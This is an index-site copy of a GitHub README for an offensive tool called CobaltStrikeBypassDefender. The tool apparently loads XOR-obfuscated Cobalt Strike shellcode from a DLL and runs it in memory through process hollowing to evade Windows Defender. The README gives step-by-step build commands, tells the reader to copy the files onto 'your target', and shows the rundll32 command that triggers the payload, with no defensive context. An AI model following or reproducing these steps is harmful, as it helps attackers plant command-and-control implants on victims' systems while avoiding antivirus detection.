Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/processust/cobaltstrikebypassdefender

A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique
https://github.com/processust/cobaltstrikebypassdefender

cobalt dll hollowing malware process shellcode strike

Last synced: about 2 months ago
JSON representation

A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique

Awesome Lists containing this project

README

        

# CobaltStrikeBypassDefender


A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique




-----------------------------------------------------


My youtube video on this repo :








-----------------------------------------------------

### Usage

1. Generate a x64 cobalt strike shellcode with CSSG :
```
https://github.com/RCStep/CSSG
```
2. Copy your shellcode in obfu.cpp (in "ANTIVIRUS_EXCLUDED_FOLDER" folder) and compile it :
```
C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o obfu.exe obfu.cpp
```
3. Execute obfu.exe, give your own xor secret
4. Copy obfuscated-shellcode.cpp content in dll.cpp file and update shellcode char array variable in process hollowing functions
5. Compile dll.cpp and launcher.cpp :
```
C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o shellcode.dll -shared dll.cpp

C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o launcher.exe launcher.cpp
```
6. Copy launcher.exe, shellcode.dll and the 3 library files on your target and execute launcher.exe or trigger the RunThatShit function with rundll32 :
```
rundll32 shellcode.dll, RunThatShit
```
7. Enjoy :)


-----------------------------------------------------------------------------------




My blog : https://lestutosdeprocessus.fr




My Discord server : https://discord.gg/JJNxV2h